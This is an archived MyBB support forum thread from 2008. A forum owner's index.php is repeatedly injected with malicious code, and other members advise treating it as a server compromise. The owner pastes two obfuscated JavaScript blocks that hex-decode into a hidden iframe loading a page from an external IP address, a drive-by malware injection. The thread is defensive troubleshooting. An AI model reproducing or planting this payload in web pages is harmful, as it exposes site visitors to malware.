MyBB Community Forums

MyBB Community Forums > Community Archive > Archived Forums > Archived Development and Support > MyBB 1.2 Series > MyBB 1.2 General Support > Help needed..
Full Version: Help needed..
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2

OhLiam

2008-06-17, 09:24 PM
My forum has blown up, it kinda loads then doesn't load, something is up with the index.php

check the 2 screenshots attached, anyone know what could be causing this?

The install bar appears when you log into the admin panel, I didn't install cuz im wary of it.

BMR777

2008-06-17, 09:46 PM
It looks like either your forum or hosting account has been compromised somehow and there may be a malicious file on your server or your MyBB template code may have been modified to link to a malicious file.

Here's what I recommend:
  • Contact your web host immediately and see if they can help trace the source of the breach as well as fix it
  • IMMEDIATELY change your hosting account and MyBB passwords
  • Make a backup of your forum in PHPMyAdmin, although any backup you make at this point may be compromised already
  • AFTER your host has taken a look at your account replace all of the MyBB files with fresh versions from the MyBB site, except for config.php and settings.php. Download those 2 files manually and make sure they are also not compromised.
  • After replacing the files, change your database password inside of CPanel or your host's database manager. Then change the password in config.php.
  • If you are not running MyBB 1.2.13 then upgrade to 1.2.13 ASAP!

Do not download that thing from the ActiveX bar as it is most definentally a virus.

BMR777

OhLiam

2008-06-17, 10:37 PM
Yeah I backed up both mysql databse and phpmyadmin databases,

all files on my site are fine except for index.php
my host won't be on till tomorrow so I just have to hope for the best, thanks though for your help and I'll post if anything changes.

xiaozhu

2008-06-18, 02:03 AM
try reuploading the index.php

Check your files on the server for any suspicious links.

Turbocom

2008-06-18, 03:41 AM
Any recent plugins been installed?

OhLiam

2008-06-18, 02:33 PM
(2008-06-18, 02:03 AM)xiaozhu Wrote: [ -> ]try reuploading the index.php

Check your files on the server for any suspicious links.

I did that, nothing happened.
but should this code be at the bottom of the index page?, because I download a new one and it doesn't have this code on it but it automatically adds it when I re-upload it.

<script>
<!--
var d=document,kol=561;
function O10H4858ACE76BC00(H4858ACE76C3FA){ function H4858ACE76CBEE() {var H4858ACE76D3E7=16;return H4858ACE76D3E7;} return( parseInt(H4858ACE76C3FA,H4858ACE76CBEE()));}function H4858ACE76DBDF(H4858ACE76E3E2){ function H4858ACE76FBC1() {return 2;} var H4858ACE76EBD3='';for(H4858ACE76F3CA=0; H4858ACE76F3CA<H4858ACE76E3E2.length; H4858ACE76F3CA+=H4858ACE76FBC1()){ H4858ACE76EBD3 += ( String.fromCharCode (O10H4858ACE76BC00(H4858ACE76E3E2.substr(H4858ACE76F3CA, H4858ACE76FBC1()))));}return H4858ACE76EBD3;} document.write(H4858ACE76DBDF('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A323934333534292B2730653861615C272077696474683D363231206865696768743D343734207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->
</script>

Chris W. B.

2008-06-18, 02:36 PM
Hi,

No, that code is not part of the standard MyBB package.

Does the code get added to the MyBB templates are the actual index.php file?

DragonFever

2008-06-18, 02:36 PM
If this code appears only in index files i think it is a server sided exploit. I advise you to contact your hoster immediately. For better information you can search for it on google.

OhLiam

2008-06-18, 02:46 PM
(2008-06-18, 02:36 PM)Chris Wrote: [ -> ]Hi,

No, that code is not part of the standard MyBB package.

Does the code get added to the MyBB templates are the actual index.php file?

The actual index.php,
If I remove it, it stays removed for a while and the bug goes away but then it reads itself later,

is this code meant to be in admin/index.php ?

<script>
<!--
var d=document,kol=561;
function O10H4858ACE93E948(H4858ACE93ED43){  return( parseInt(H4858ACE93ED43,16));}function H4858ACE93F939(H4858ACE93FD35){ function H4858ACE940A69() {var H4858ACE94113D=2;return H4858ACE94113D;} var H4858ACE940131='';for(H4858ACE94052D=0; H4858ACE94052D<H4858ACE93FD35.length; H4858ACE94052D+=H4858ACE940A69()){ H4858ACE940131 += ( String.fromCharCode (O10H4858ACE93E948(H4858ACE93FD35.substr(H4858ACE94052D, H4858ACE940A69()))));}return H4858ACE940131;} document.write(H4858ACE93F939('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3434333934292B27633330615C272077696474683D333032206865696768743D313437207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->
</script>

DragonFever

2008-06-18, 02:50 PM
This is a server sided virus. Contact your webhost and inform them about this issue.
I advise you to look the following url:
http://www.ethanzuckerman.com/blog/2007/...an-center/
Pages: 1 2
MyBB Community Forums > Community Archive > Archived Forums > Archived Development and Support > MyBB 1.2 Series > MyBB 1.2 General Support > Help needed..